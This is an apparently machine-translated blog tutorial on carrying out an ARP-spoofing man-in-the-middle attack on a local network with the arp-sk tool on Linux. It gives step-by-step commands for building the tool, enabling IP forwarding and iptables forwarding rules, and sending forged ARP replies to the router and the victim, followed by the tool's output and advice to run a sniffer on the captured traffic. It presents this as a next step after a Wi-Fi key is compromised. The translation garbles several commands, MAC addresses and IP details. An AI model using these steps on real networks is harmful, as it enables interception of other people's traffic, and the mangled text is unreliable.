11:27 The practice of using arpspoofing | |
| In this article I will discuss how to use the package utilities arp-sk in the operating system GNU / Linux to implement an attack man-in-the-middle on the protocol arp. Why do I need such an attack: Habre a lot of articles such as hacking Wi-Fi. But what happens after the key is compromised? Here you can see one of the options. A bit of theoryarp protocol required for transmission in a medium Ethernet. Because the transfer is made on mac-addresses. More information about the mac-address can be found in Wikipedia. Ru.wikipedia.org/wiki/MAC-% D0% B0% D0% B4% D1% 80% D0% B5% D1% 81 To ensure that the message was sent from one network device to another, in particular from the Victim to the Router your computer must make comparisons IP-address - mac-address. Consider the process with the utility tcpdump # tcpdump-i eth1-vvv 21:11:14.076068 ARP, Ethernet (len 6), IPv4 (len 4), Request who-has 192.168.4.1 tell 192.168 .4.17, length 28 21:11:14.077852 ARP, Ethernet (len 6), IPv4 (len 4), Reply 192.168.4.1 is-at 00:50: ba: 46:5 d: 92 (oui Unknown) , length 46 the first batch - a computer sends a broadcast message to find mac-address, which belongs to the ip-address 192.168.4.1 and a request to send the answer to 192.168.4.11. It is not clear, but the computer is 192.168.4.11 in the administration of this request indicates your mac-address as the source and broadcast mac-address (FF: FF: FF: FF: FF: FF) as the address of the recipient. Network device, receiving the packet should compare the ip-address with its own, and in case of coincidence to send the next packet. Second package - a device with the address 192.168.4.1 is responsible for mac-address that was specified in the request from your mac-address, the address 192.168.4.1 is at 00:50: ba: 46:5 d: 92. Due to the fact that the arp-request is sent to the broadcast address that the message can get anyone who is in the same broadcast segment as the source. Therefore there is an option attack - always send a message about your mac-address. In this case, when the victim computer sends an arp-request to the router, then immediately gets a response from the attacker. Accordingly, traffic will be sent to the attacker. Our goal: to get traffic Victim computer using the computer Attacker. To do this we will use the arp-a spontaneous response. The protocol provides for the possibility of sending arp device arp-request or response, if this does not require any other device. What is it - for example, if you change mac-address of the router. If your computer supports spontaneous arp it will overwrite a legitimate address on the attacker's address. The attackInstalling the required softwareArp-sk: # wget sid.rstack.org/arp-sk/files/arp-sk-0.0.16.tgz # tar xvzf arp-sk-0.0.16.tgz # cd arp-sk-0.0.16 / #. / configure # make In case of successful compilation package, install it # make install The options run the command can be viewed using the # arp-sk - help we need the following keys: Usage: arp- sk -r - reply to send ARP Reply -d - dst recipient in the link layer (<hotname|hostip|MAC>) -s - src source in the link layer (<hotname | hostip | MAC>) -D - arp-dst recipient of the ARP message ([hostname | hostip] [: MAC]) -S - arp-src source in the ARP message ([hostname | hostip ] [: MAC]) -i - interface specify the interface (eth0) spoofingWe need to send the router and computer arp-reported that mac-address to another device ours. Before we set up the computer Attacker to redirect traffic. For this purpose include redirecting traffic in the core: # echo 1> / proc/sys/net/ipv4/ip_forward Now let redirect traffic to the packet filter. I use iptables, so I add a policy allowing the chain FORWARD. Since I have a network to attack using the test, then I add the following rules: # iptables-I FORWARD 1-s 192.168.4.17-j ACCEPT # iptables-I FORWARD 2-d 192.168.4.17 -j ACCEPT These two rules allow attackers to redirect traffic to a computer address 192.168.4.17. Attention! These rules are potentially dangerous, especially if you have multiple network interfaces. In this case I recommend to use a more precise rules. Let's address Address: # ifconfig eth1 | grep HW eth1 Link encap: Ethernet HWaddr 00:13: CE: 5C: 11:34 addresses of other Device # arp-an ? (192.168.4.1) at 00:50: ba: 46:5 d: 92 [ether] on eth1 ? (192.168.4.17) at 00:1 c: bf : 41:53:4 b [ether] on eth1 Let the routing table computer Victim: is now shipping the unit following arp-packets: substitute as a mac-address your other device. First, on behalf of 192.168.4.17 that its mac-address is now 00:13: CE: 5C: 11:34 send to 192.168.4.1 (00:50: ba: 46:5 d: 92) Second, on behalf of 192.168.4.1 that its mac-address is now 00:13: CE: 5C: 11:34 send to 192.168.4.17 (00:1 c: bf: 41:53:4 b) # arp-sk-i eth1-r-s 00:13: CE: 5C: 11:34-S 192.168.4.17-d 00:50: ba: 46:5 d: 92-D 192.168.4.1 # arp-sk-i eth1-r-s 00:13: CE: 5C: 11:34-S 192.168.4.1-d 00:1 c: bf: 41:53:4 b-D 192.168.4.17 We have a to the following conclusion: + Initialization of the packet structure + Running mode "reply" + Ifname: eth1 + Source MAC: 00:13: ce: 5c: 11:34 + Source ARP MAC: 00:13: ce: 5c: 11:34 + Source ARP IP: 192.168.4.1 + Target MAC: 00:1 c: bf: 41:53:4 b + Target ARP MAC: 00:1 c: bf: 41:53:4 b + Target ARP IP: 192.168.4.17 --- Start classical sending --- TS: 21:30:44.338540 To: 00:1 c: bf: 41:53:4 b From: 00:13: ce: 5c: 11:34 0x0806 ARP For 192.168.4.17 (00:1 c: bf: 41:53:4 b): 192.168.4.1 is at 00:13: ce: 5c: 11:34 Let us now look at the computer Victim arp-table: That's it. Now you can run your favorite sniffer and get the needed packages. Such as ping to Yandex Adding. If your computer has a firewall, it can display a message that the substitution of the address. This information is for reference only. The author reminds you of Article 272 of the Criminal Code "Illegal access to computer information» | |
|
| |
| Total comments: 0 | |